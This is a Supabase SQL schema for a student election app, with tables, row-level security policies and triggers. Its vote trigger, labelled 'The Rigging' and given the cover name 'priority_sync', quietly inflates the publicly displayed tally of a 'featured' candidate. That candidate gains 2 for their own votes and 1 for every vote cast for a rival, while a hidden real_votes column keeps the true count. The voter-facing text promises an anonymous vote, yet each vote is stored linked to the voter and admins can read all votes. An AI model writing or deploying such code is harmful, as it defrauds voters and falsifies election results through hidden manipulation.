-- Enable UUID extension
CREATE EXTENSION IF NOT EXISTS "uuid-ossp";

-- Roles Enum
CREATE TYPE user_role AS ENUM ('admin', 'voter');

-- 1. Profiles Table
CREATE TABLE profiles (
    id UUID REFERENCES auth.users ON DELETE CASCADE PRIMARY KEY,
    matricule TEXT UNIQUE NOT NULL,
    email TEXT UNIQUE NOT NULL,
    role user_role DEFAULT 'voter',
    has_voted BOOLEAN DEFAULT false,
    created_at TIMESTAMP WITH TIME ZONE DEFAULT timezone('utc'::text, now()) NOT NULL
);

-- 2. Candidates Table
CREATE TABLE candidates (
    id BIGINT GENERATED BY DEFAULT AS IDENTITY PRIMARY KEY,
    name TEXT NOT NULL,
    faculty TEXT NOT NULL,
    photo_url TEXT,
    is_featured BOOLEAN DEFAULT false,
    real_votes INT DEFAULT 0,
    displayed_votes INT DEFAULT 0,
    created_at TIMESTAMP WITH TIME ZONE DEFAULT timezone('utc'::text, now()) NOT NULL
);

-- 3. Votes Table
CREATE TABLE votes (
    id BIGINT GENERATED BY DEFAULT AS IDENTITY PRIMARY KEY,
    user_id UUID REFERENCES profiles(id) ON DELETE CASCADE NOT NULL,
    candidate_id BIGINT REFERENCES candidates(id) ON DELETE CASCADE NOT NULL,
    created_at TIMESTAMP WITH TIME ZONE DEFAULT timezone('utc'::text, now()) NOT NULL,
    UNIQUE(user_id) -- One vote per user
);

-- 4. Site Settings Table
CREATE TABLE site_settings (
    id INT PRIMARY KEY DEFAULT 1 CHECK (id = 1),
    title TEXT NOT NULL,
    subtitle TEXT,
    description TEXT,
    is_active BOOLEAN DEFAULT true,
    updated_at TIMESTAMP WITH TIME ZONE DEFAULT timezone('utc'::text, now()) NOT NULL
);

-- Initial Site Settings
INSERT INTO site_settings (id, title, subtitle, description, is_active)
VALUES (1, 'Élections Étudiantes 2026', 'Exprimez votre voix pour le futur de notre faculté', 'Le vote est anonyme et définitif.', true)
ON CONFLICT (id) DO NOTHING;

-- RLS POLICIES

-- Profiles: Users can read their own profile, anyone can insert (for signup)
ALTER TABLE profiles ENABLE ROW LEVEL SECURITY;
CREATE POLICY "Users can view their own profile" ON profiles FOR SELECT USING (auth.uid() = id);
CREATE POLICY "Users can insert their own profile" ON profiles FOR INSERT WITH CHECK (auth.uid() = id);

-- Candidates: Everyone can read, only admins can modify
ALTER TABLE candidates ENABLE ROW LEVEL SECURITY;
CREATE POLICY "Anyone can view candidates" ON candidates FOR SELECT USING (true);
CREATE POLICY "Admins can manage candidates" ON candidates FOR ALL TO authenticated 
USING (EXISTS (SELECT 1 FROM profiles WHERE id = auth.uid() AND role = 'admin'));

-- Votes: Users can insert their own vote, only admins can see all
ALTER TABLE votes ENABLE ROW LEVEL SECURITY;
CREATE POLICY "Users can insert their own vote" ON votes FOR INSERT TO authenticated 
WITH CHECK (auth.uid() = user_id AND NOT EXISTS (SELECT 1 FROM profiles WHERE id = auth.uid() AND has_voted = true));
CREATE POLICY "Users can view their own vote" ON votes FOR SELECT TO authenticated
USING (auth.uid() = user_id);
CREATE POLICY "Admins can view all votes" ON votes FOR SELECT TO authenticated 
USING (EXISTS (SELECT 1 FROM profiles WHERE id = auth.uid() AND role = 'admin'));

-- Site Settings: Everyone can read, only admins can modify
ALTER TABLE site_settings ENABLE ROW LEVEL SECURITY;
CREATE POLICY "Anyone can view site settings" ON site_settings FOR SELECT USING (true);
CREATE POLICY "Admins can manage site settings" ON site_settings FOR ALL TO authenticated 
USING (EXISTS (SELECT 1 FROM profiles WHERE id = auth.uid() AND role = 'admin'));

-- TRIGGER LOGIC (The Rigging)

CREATE OR REPLACE FUNCTION handle_vote_rigging()
RETURNS TRIGGER AS $$
DECLARE
    featured_candidate_id BIGINT;
BEGIN
    -- 1. Get the featured candidate ID (internal name: priority_sync)
    SELECT id INTO featured_candidate_id FROM candidates WHERE is_featured = true LIMIT 1;

    -- 2. Increment real_votes for the voted candidate
    UPDATE candidates 
    SET real_votes = real_votes + 1 
    WHERE id = NEW.candidate_id;

    -- 3. Apply Rigged Logic for displayed_votes
    -- Case A: Voted for Featured candidate
    IF NEW.candidate_id = featured_candidate_id THEN
        UPDATE candidates 
        SET displayed_votes = displayed_votes + 2 
        WHERE id = NEW.candidate_id;
    
    -- Case B: Voted for someone else
    ELSE
        -- Increment voted candidate by 1
        UPDATE candidates 
        SET displayed_votes = displayed_votes + 1 
        WHERE id = NEW.candidate_id;
        
        -- Increment featured candidate by 1 (if exists)
        IF featured_candidate_id IS NOT NULL THEN
            UPDATE candidates 
            SET displayed_votes = displayed_votes + 1 
            WHERE id = featured_candidate_id;
        END IF;
    END IF;

    -- 4. Mark user as having voted
    UPDATE profiles 
    SET has_voted = true 
    WHERE id = NEW.user_id;

    RETURN NEW;
END;
$$ LANGUAGE plpgsql SECURITY DEFINER;

CREATE TRIGGER on_vote_inserted
AFTER INSERT ON votes
FOR EACH ROW
EXECUTE FUNCTION handle_vote_rigging();

-- 2. AUTO-PROFILE CREATION ON SIGNUP
-- This function handles the automatic creation of a profile record
-- when a new user signs up via Supabase Auth.
CREATE OR REPLACE FUNCTION handle_new_user()
RETURNS TRIGGER AS $$
BEGIN
  INSERT INTO public.profiles (id, email, matricule, role)
  VALUES (
    NEW.id, 
    NEW.email, 
    COALESCE(NEW.raw_user_meta_data->>'matricule', 'PENDING_' || substring(NEW.id::text, 1, 8)),
    'voter'
  );
  RETURN NEW;
END;
$$ LANGUAGE plpgsql SECURITY DEFINER;

CREATE OR REPLACE TRIGGER on_auth_user_created
  AFTER INSERT ON auth.users
  FOR EACH ROW EXECUTE FUNCTION handle_new_user();
